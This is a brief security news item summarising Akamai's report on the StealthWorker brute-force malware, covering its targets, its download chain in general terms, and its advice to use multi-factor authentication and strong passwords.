The security experts at Akamai security intelligence and threat research have come across a malware that can target windows and linux systems.
The malware is written in Golang. Once a system is infected with this malware, the attackers then use it to probe other targets in order to spread and continue their brute force operations.
StealthWorker malware can run brute force attacks against many popular web services and platforms including, cPanel/WHM, wordpress,Drupal,Joomla,OpenCart,Magento, MySQL, PostgreSQL, Brixt, SSH and FTP, says the report.
Once initialized the uploader script connects to vps acting and downloads a second script which acts as the downloader. This downloader will retrieve a binary from the command and control(C2) server depending on the output by LONG_BIT, which determines the server’s architecture. Finally when the binary retrieval is complete, the downloader script is deleted.
Botnets like these prey on weak authentication measures and automation in order to infiltrate servers and infect them with malware. This is why it is important to use multi-factor authentication and robust password policies.
If you want to read more about this report, read here: https://blogs.akamai.com/sitr/2020/06/stealthworker-golang-based-brute-force-malware-still-an-active-threat.html
